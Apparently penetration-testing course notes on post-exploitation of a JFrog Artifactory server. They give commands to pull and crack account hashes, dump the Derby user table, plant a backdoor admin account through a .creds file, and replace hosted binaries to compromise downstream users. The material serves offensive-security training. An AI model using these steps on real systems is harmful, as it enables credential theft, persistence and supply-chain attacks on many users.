# Artifactory

Check status: `ps aux | grep artifactory`

External access: `http://serverip:8081`

## Sensitive information

with root access to the server, check `/{ARTIFACTORY FOLDER}/var/backup/access` for artifactory accounts

{% code overflow="wrap" %}

```
root@controller:/opt/jfrog/artifactory/var/backup/access# 
cat access.backup.20200730120454.json
```

{% endcode %}

Check "password" -

{% code title="hash.txt" %}

```
$2a$08$xxxx./yyyy
```

{% endcode %}

### Crack password

```
sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

<pre><code>hashcat hash.txt <a data-footnote-ref href="#user-content-fn-1">--force</a> --hash-type=3200
</code></pre>

## Compromise DB

{% code title="dump db & unlock" overflow="wrap" %}

```
mkdir /tmp/hackeddb
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/hackeddb
sudo chmod 755 /tmp/hackeddb/derby
sudo rm /tmp/hackeddb/derby/*.lck
```

{% endcode %}

Since Artifactory is using Derby as its default database, we'll need Apache's Derby tools to be able to connect to it. More specifically, the *ij* command line tool, which allows the user to access a Derby database and perform queries against it. The Derby tools are already installed on the controller at /opt/derby, but they can also be downloaded if necessary.

Fortunately for us, the default database does not require a username and password and relies on file permissions to protect it. Because we have *root* privileges, we can connect without problems. Artifactory contains its own version of Java and we can use it to run the Derby connection utilities and connect to our database.

<pre data-overflow="wrap"><code><a data-footnote-ref href="#user-content-fn-2">sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij</a>

ij>
connect 'jdbc:derby:/tmp/hackeddb/derby';
select * from access_users;
</code></pre>

Crack the bcrypt hashes as above

## Add backdoor user

This method requires write access to the /opt/jfrog/artifactory/var/etc/access folder and the ability to change permissions on the newly-created file, which usually requires *root* or *sudo* access.

`/opt/jfrog/artifactory/var/etc/access`

{% code title="create hack.creds" %}

```
admin2@*=adminpwd
```

{% endcode %}

{% code overflow="wrap" %}

```
sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/hack.creds
```

{% endcode %}

{% code overflow="wrap" %}

```
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start

sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log
```

{% endcode %}

We now have admin access to Artifactory and can modify binaries as we see fit.

In a real-world scenario, **if the user was using Artifactory as a repository, running an update on their local system would trigger a download of the updated binary. The next time the binary is run by the user, they would be compromised.** The same would occur if Artifactory was being used as a simple file store for shared binary files. Any subsequent downloads of our updated file would result in the user being compromised.

Artifactory is an excellent option for compromising many targets in a single effort and can help to expand access significantly within an internal network.

[^1]: can be omit if run outside of VM

    add -d # flag to specify hardware used for cracking

[^2]: The first part of the command calls the embedded version of Java included as part of Artifactory. We're specifying that we want to run the derbyrun.jar JAR file. The ij parameter indicates that we want to use Apache's *ij*[](https://portal.offsec.com/courses/pen-300/books-and-videos/modal/modules/linux-lateral-movement/devops/compromising-artifactorys-database#fn3) tool to access the database.